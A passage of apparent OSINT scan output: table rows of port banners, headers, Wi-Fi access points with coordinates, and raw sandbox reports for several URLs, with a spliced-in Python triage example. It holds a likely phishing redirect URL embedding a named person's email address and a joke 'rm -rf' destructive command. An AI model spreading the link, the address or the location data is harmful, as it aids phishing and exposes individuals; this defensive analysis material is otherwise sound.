00000000-00003948]\n "Tabs_13322826250079073" has type "data"- [targetUID: N/A]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003948]\n "f34135bd94e6cca1_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\f34135bd94e6cca1_0]- [targetUID: 00000000-00003948]\n "1ccf603e-eda4-4df8-bba2-0e7bfd009569.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\1ccf603e-eda4-4df8-bba2-0e7bfd009569.tmp]- [targetUID: 00000000-00003948]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.4\\edge_autofill_field_data.json]- [targetUID: 00000000-00003948]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00003948]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines 
with CRLF line terminators"- Location: [%TEMP%\\3948_1394555003\\auto_open_controller.js]- [targetUID: 00000000-00003948]\n "ce116d68-26b8-44ed-a9db-e5a854af5c79.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ce116d68-26b8-44ed-a9db-e5a854af5c79.tmp]- [targetUID: 00000000-00003948]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens\\LOG]- [targetUID: 00000000-00003948]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.britishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org"\n Pattern match: "Math.PI/180"\n Heuristic match: "api.salesflare.com"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "https://llink.to"\n Pattern match: "https://rabetsanatkoosha.com/SNS/site.php"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "rabetsanatkoosha.com"\n Heuristic match: "stackpath.bootstrapcdn.com"\n Heuristic match: "track.salesflare.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: 
"www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://idsync.rlcdn.com,supports_spdy:true},{isolation:[],server:https://pippio.com,supports_spdy:true},{isolation:[],server:https://assets.msn.com,supports_spdy:true},{isolation:[],server:https://ntp.msn.com,supports_spdy:true}"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"\n Heuristic match: "ishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org"\n Pattern match: "llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.britishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org"\n Heuristic match: "ouncil.org"\n Heuristic match: "link.to"\n Heuristic match: "u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.britishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.brit"\n Pattern match: "https://llx"\n Heuristic match: "api.ipify.org"\n Heuristic match: "checkip.amazonaws.com"\n Heuristic match: "checkip.dyndns.com"\n Heuristic match: "checkip.dyndns.org"\n Heuristic match: "checkip.org"\n Heuristic match: "checkmyip.com"\n Heuristic match: "cmyip.com"\n Heuristic match: "curlmyip.com"\n Heuristic match: "findmyip.org"\n Heuristic match: "formyip.com"\n Heuristic match: "geoip.co.uk"\n Heuristic match: "geoiptool.com"\n Heuristic match: "getmyip.co.uk"\n Heuristic match: "getmyip.org"\n Heuristic match: "icanhazip.com"\n Heuristic match: "ifconfig.me"\n Heuristic match: "ip-addr.es"\n Heuristic match: "ip-address.domaintools.com"\n Heuristic match: "ip-api.com"\n Heuristic match: 
"ip-score.com"\n Heuristic match: "ip.jsontest.com"\n Heuristic match: "ip.xss.ru"\n Heuristic match: "ip4.telize.com"\n Heuristic match: "ipchicken.com"\n Heuristic match: "ipecho.net"\n Heuristic match: "ipinfo.info"\n Heuristic match: "ipinfo.io"\n Heuristic match: "ipleak.net"\n Heuristic match: "ipligence.com"\n Heuristic match: "knowmyip.com"\n Heuristic match: "maxmind.com"\n Heuristic match: "meineipadresse.de"\n Heuristic match: "myexternalip.com"\n Heuristic match: "myip.dnsomatic.com"\n Heuristic match: "myip.ht"\n Heuristic match: "myip.nl"\n Heuristic | 185.199.109.153 |
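The Hybrid Analysis cells in this table (the favicon.io report a few rows up and the llink.to report just above) are Python 2 `repr` output with `u''` strings rather than JSON, and the useful signal is buried in the `signatures` list: the `threat_level` of each signature, the `attck_id` fields, the AV ratio in the `avtest-1` description, and the (sometimes duplicated) `compromised_hosts`. The block below is an added example, not code from SpiderFoot or Hybrid Analysis, showing how to load such a cell safely with `ast.literal_eval` and reduce it to a triage summary. The sample report is constructed in the same shape, with values copied from the favicon.io report and the ATT&CK entry from the icba.com report; the `triage` thresholds are this example's own rule of thumb, not the sandbox's verdict.

```python
import ast
import re

# Constructed sample in the shape of the Hybrid Analysis dumps in this table
# (a Python 2 repr with u'' strings, not JSON). Values are copied from the
# favicon.io report above; the long signature list is trimmed.
SAMPLE_REPORT = """[{u'submit_name': u'http://favicon.io/', u'threat_score': 65,
 u'compromised_hosts': [u'34.148.97.127', u'34.148.97.127'], u'environment_id': 100,
 u'signatures': [
  {u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id': None,
   u'threat_level_human': u'informative', u'threat_level': 0, u'description': u'"favicon.io"'},
  {u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id': u'T1573',
   u'threat_level_human': u'informative', u'threat_level': 0, u'description': u'"GET / HTTP/1.1"'},
  {u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines',
   u'attck_id': None, u'threat_level_human': u'informative', u'threat_level': 0,
   u'description': u'0/93 Antivirus vendors marked sample as malicious (0% detection rate)'},
  {u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched',
   u'attck_id': None, u'threat_level_human': u'suspicious', u'threat_level': 1,
   u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'},
  {u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host',
   u'attck_id': None, u'threat_level_human': u'suspicious', u'threat_level': 1,
   u'description': u'Found malicious artifacts related to "34.148.97.127": ...'}],
 u'mitre_attcks': [{u'attck_id': u'T1071.004', u'technique': u'DNS', u'tactic': u'Command and Control'}]}]"""

AV_RE = re.compile(r"(\d+)/(\d+) Antivirus vendors marked sample as malicious")


def load_reports(text):
    """Parse the Python-repr dump. literal_eval accepts u'' strings and never executes code,
    which matters because this text came from a third-party API response."""
    reports = ast.literal_eval(text)
    return reports if isinstance(reports, list) else [reports]


def summarize(report):
    """Reduce one report to the fields an analyst scans first."""
    sigs = report.get("signatures") or []
    av = None
    for sig in sigs:
        m = AV_RE.search(sig.get("description") or "")
        if m:
            av = (int(m.group(1)), int(m.group(2)))
    attck = {s["attck_id"] for s in sigs if s.get("attck_id")}
    attck |= {t["attck_id"] for t in report.get("mitre_attcks") or [] if t.get("attck_id")}
    return {
        "submit_name": report.get("submit_name"),
        "threat_score": report.get("threat_score"),
        # The dump repeats hosts once per port; de-duplicate for the summary.
        "hosts": sorted(set(report.get("compromised_hosts") or [])),
        "av_detections": av,
        "attck_ids": sorted(attck),
        "suspicious": [s["name"] for s in sigs if (s.get("threat_level") or 0) >= 1],
        "max_threat_level": max((s.get("threat_level") or 0 for s in sigs), default=0),
    }


def triage(summary):
    """Rule of thumb used here (an assumption, not Hybrid Analysis's own verdict):
    escalate on any suspicious/malicious signature or a threat_score of 50 or more.
    A 0/N AV line only says the submitted URL itself is undetected; it does not
    clear the hosts it contacted, which is exactly what network-21 flags."""
    reasons = []
    if summary["max_threat_level"] >= 2:
        reasons.append("malicious signature")
    elif summary["max_threat_level"] == 1:
        reasons.append(f"{len(summary['suspicious'])} suspicious signature(s)")
    if (summary["threat_score"] or 0) >= 50:
        reasons.append(f"threat_score {summary['threat_score']}")
    return ("escalate" if reasons else "informational", reasons)


if __name__ == "__main__":
    for rep in load_reports(SAMPLE_REPORT):
        s = summarize(rep)
        print(s["submit_name"], triage(s), s["attck_ids"], s["hosts"])
```

On the sample this escalates on two suspicious signatures plus the threat score even though the AV line reads 0/93, which is the point: the verdict fields of a URL detonation and the reputation of the hosts it touched are separate signals and should be read separately.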
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 1 | 2 | 0 | None | 220-cp.keyubu.net ESMTP Exim 4.95 #2 Thu, 11 May 2023 00:03:02 +0300
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
| 87.248.157.102 |
| 2023-05-12 03:09:35 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 216.30.196.104.bc.googleusercontent.com | 104.196.30.216 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan47b (Net ID: 00:02:6F:08:22:03) | 37.7642, -122.3993 |
| 2023-05-12 02:45:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://angryip.org/download/#windows', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_8b8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_8b8_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_8b8_IESQMMUTEX_0_519"\n "IsoScope_8b8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "IsoScope_8b8_IE_EarlyTabStart_0xdb4_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2232"\n "IsoScope_8b8_ConnHashTable<2232>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "142.250.189.226:443"\n 
"142.251.46.226:443"\n "142.251.32.33:443"\n "74.125.137.157:443"\n "142.251.32.34:443"\n "142.250.189.195:443"\n "142.250.191.42:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"angryip.org"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "googleads.g.doubleclick.net"\n "pagead2.googlesyndication.com"\n "partner.googleadservices.com"\n "stats.g.doubleclick.net"\n "tpc.googlesyndication.com"\n "www.googletagservices.com"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"function Hn(a){switch(a){case "true":return!0;case "false":return!1;case "null":return null;case "undefined":break;default:try{var b=a.match(/^(?:\'(.*)\'|"(.*)")$/);if(b)return b[1]||b[2]||"";if(/^[-+]?\\d*(\\.\\d+)?$/.test(a)){var c=parseFloat(a);return c===c?c:void 0}}catch(d){}}};function In(a){if(a.google_ad_client)return String(a.google_ad_client);var b,c,d,e,f;if(null!=(e=null!=(d=null==(b=X(a).head_tag_slot_vars)?void 0:b.google_ad_client)?d:null==(c=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:c.getAttribute("data-ad-client")))b=e;else{b:{b=a.document.getElementsByTagName("script");a=a.navigator&&a.navigator.userAgent||"";a=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")\n "function iF(a){var b=a.j.wpc;if(null!==b&&""!==b)var 
c=b;else{b=a.j;a=a.win;if(a.google_ad_client)var d=String(a.google_ad_client);else{var e,f,g;if(null!=(g=null!=(f=null==(d=ME(a).head_tag_slot_vars)?void 0:d.google_ad_client)?f:null==(e=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:e.getAttribute("data-ad-client")))d=g;else{c:{d=a.document.getElementsByTagName("script");e=a.navigator&&a.navigator.userAgent||"";e=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB03F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB01E.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003832]\n "CabB02E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB02E.tmp]- [targetUID: 
00000000-00003832]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "f_2_.txt" has type "ASCII text with very long lines"- [targetUID: N/A]\n "TarB03F.tmp" has type "data"- Location: [%TEMP%\\TarB03F.tmp]- [targetUID: 00000000-00003832]\n "rx_lidar_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ads_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003832]\n "analytics_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "20bbf47129839b0fb73908ded7623d1d_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "DzRfYBHlb_-YbcWIbUWhaiqMI2yuoh2HvVgg6okGiSg_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "f_5_.txt" has type "ASCII text with very long lines"- [targetUID: N/A]\n "f_3_.txt" has type "ASCII text with very long lines"- [targetUID: N/A]\n "4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrw2IJllpy8_1_.woff" has type "Web Open Font Format TrueType length 24196 version 1.1"- [targetUID: N/A]\n "4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrwEIJllpy8_1_.woff" has type "Web Open Font Format TrueType length 23148 version 1.1"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet 
Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002232]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "sodar2_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "f_3_.txt" has type "JSON data"- [targetUID: N/A]\n "~DFA0DE7E20CA2F8F31.TMP" has type "data"- Location: [%TEMP%\\~DFA0DE7E20CA2F8F31.TMP]- [targetUID: 00000000-00002232]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39', u'name': u'Drops XML files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 8, u'description': u'"angryip_1_.xml" has type "Unknown"\n "www.google_1_.xml" has type "Unknown"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://angryip.org/download/#windows"\n Pattern match: "https://angryip.org"\n Pattern match: "https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe;yd(a,function(d,e){if(d||0===d)c+=&+e+=+encodeURIComponent(+d)});Od(c,b)}function"\n Pattern match: "https://pagead2.googlesyndication.com+b,d=ke(a)-b.length;if"\n Pattern match: "https://pagead2.googlesyndication.com/pagead/ping,If,void"\n Pattern match: "https://pagead2.googlesyndication.com/pagead/js/err_rep.js"\n Pattern match: "https://pagead2.googlesyndication.com/pagead/gen_204?id=plmetrics;window.LayoutShift&&"\n Pattern match: "https://www.google.com/adsense"\n Pattern match: "https://adsense.com"\n Pattern match: 
"https://pagead2.googlesyndication.com/pagead/managed/js/adsense/,/slotcar_library,.js"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "www.google-analytics.com},Ge=function(a){switch(a){default:case"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://tagassistant.google.com/"\n P | 185.199.111.153 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2052 | 172.67.168.252 |
| 2023-05-12 02:44:04 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | Fastly CDN Fastly | battleb0t.xyz |
| 2023-05-12 03:01:46 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.254): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c52e4b1988e1e3e-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 02:54:10 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:09:27 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 | 188.114.97.1 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/master058_2.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:06:25:AC:5B:3E) | 39.0469, -77.4903 |
| 2023-05-12 02:46:50 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.148.97.127 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PumaLANd Airport 1 (Net ID: 00:02:2D:39:EC:A6) | 34.0544, -118.244 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Enis_Home (Net ID: 00:02:CF:DB:CE:E7) | 40.2024, 29.0398 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-9796 (Net ID: 5C:8F:E0:22:97:94) | 37.751, -97.822 |
| 2023-05-12 02:48:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 64, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://rathook.cc/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:4108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:3580:304:WilStaging_02"\n "SM0:3580:120:WilError_01"\n "Local\\SM0:3580:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:4108:120:WilError_01"\n "SM0:4108:304:WilStaging_02"\n "Local\\SM0:4108:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4108:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rathook.cc"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<meta name="twitter:card" content="summary_large_image">" (Indicator: "twitter")\n "<meta name="twitter:title" content="rathook.cc">" (Indicator: "twitter")\n "<meta name="twitter:description" content="So good that it rm -rf\'s your /">" (Indicator: "twitter")\n "<meta name="twitter:image" content="https://rathook.cc/rat.gif">" (Indicator: "twitter")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, 
u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_2]- [targetUID: 00000000-00004108]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00004108]\n "f_0004c4" has type "Audio file with ID3 version 2.4.0 contains:MPEG ADTS layer III v1 64 kbps 44.1 kHz Stereo"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c4]- [targetUID: 00000000-00003380]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00004108]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00003580]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00004108]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00004108]\n "data_0" has type "data"- Location: 